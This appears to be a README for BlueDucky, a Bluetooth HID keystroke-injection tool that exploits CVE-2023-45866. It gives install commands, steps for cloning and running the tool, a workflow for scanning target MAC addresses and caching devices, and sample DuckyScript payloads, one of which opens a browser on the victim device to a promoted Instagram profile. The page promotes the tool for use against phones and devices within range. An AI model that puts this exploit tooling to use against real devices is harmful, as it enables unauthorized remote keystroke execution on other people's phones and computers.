Ported & Optimized for Kali Linux by Hackwithakki
Welcome dear HACK3RS Make sure to join us on Telegram ! Visit Here -🎭 https://t.me/hackwithakki 🎭
🔹 Credits to the original contributors:
ᯓ➤[saad0x1 on GitHub]
ᯓ➤[spicydll on GitHub]
🚨 CVE-2023-45866 - Exploitation via DuckyScript 🦆
🔓 Unauthenticated Bluetooth Peering ᯓ➤Remote Code Execution (Using HID Keyboard)
This tool is based on the vulnerability Discovered by Marc Newlin CVE-2023-45866
🧠 What is BlueDucky?
╰┈➤ BlueDucky is a powerful linux based tool for wireless HID Attack through Bluetooth. By running this Duckyscript, you can:
ᯓ➤ 📡Reconnect with previously paired Bluetooth devices (even if not visible) but have Bluetooth still enabled.
ᯓ➤ 📂 Automatically save devices to reuse.
ᯓ➤ 💌 Execute HID keystroke payloads via DuckyScript.
✔️ Tested and stable on a Raspberry Pi 4 using the default Bluetooth module
✔️ It works against various phones.
1️⃣ # update apt ᯓ➤ sudo apt-get update && sudo apt-get -y upgrade 2️⃣ # install dependencies from apt ᯓ➤ sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \ git gcc python3-pip python3-setuptools \ python3-pydbus 3️⃣ # install pybluez from source ᯓ➤ git clone https://github.com/pybluez/pybluez.git cd pybluez sudo python3 setup.py install 4️⃣ # build bdaddr from the bluez source ᯓ➤ cd ~/ git clone --depth=1 https://github.com/bluez/bluez.git gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth sudo cp bdaddr /usr/local/bin/1️⃣ # update pacman & packages ᯓ➤ sudo pacman -Syyu 2️⃣ # install dependencies # since arch doesnot separate lib packages: libbluetooth-dev included in bluez package ᯓ➤ sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \ python-setuptools python-pydbus python-dbus git gcc python-pip \ 3️⃣ # install pybluez from source ᯓ➤ git clone https://github.com/pybluez/pybluez.git cd pybluez sudo python3 setup.py install 4️⃣ # build bdaddr from the bluez source ᯓ➤ cd ~/ git clone --depth=1 https://github.com/bluez/bluez.git gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth sudo cp bdaddr /usr/local/bin/ᯓ➤ git clone https://github.com/hackwithakki/BlueDucky.git ᯓ➤ cd BlueDucky ᯓ➤ sudo hciconfig hci0 up ᯓ➤ sudo python3 BlueDucky.pyalternatively,
ᯓ➤ pip3 install -r requirements.txtᯓ➤ After starting, it prompts for the target MAC address.
ᯓ➤ Leave it blank to start auto-scanning.
ᯓ➤ Devices previously found are stored in known_devices.txt.
ᯓ➤ If that file exists,and checks this file before scanning. it’s used as a device cache
ᯓ➤ The script executes using payload.txt file.
ᯓ➤ Successful execution will auto-connects and executes keystrokes.
🚧 Work in Progress:
- Suggest me ideas
- Updated UI
- Improved User Experience
- Bluetooth Debugger; Checks your bluetooth ON, and installed dependancies before allowing access to the application,
- this is to prevent devices that are not supported.
- Please Note: Numerous Changes have been made,please reference the commit history for specific changes.
🛡️ Notes from Hackwithakki
✅ Stable & fully optimized for Kali Linux
🧠 Ideal for pentesters and researchers
🐧 Works great on Kali, Raspberry Pi, and similar platforms
ᯓᡣ𐭩 Suggest What Should be added next! Join🔗 https://t.me/hackwithakki
REM Title of the payload STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/? GUI DREM Opens a private browser to a specific Instagram profile DELAY 200 ESCAPE GUI d ALT ESCAPE GUI b DELAY 700 REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N CTRL SHIFT n DELAY 700 CTRL l DELAY 300 STRING https://www.instagram.com/hackwithakki/ DELAY 300 ENTER DELAY 300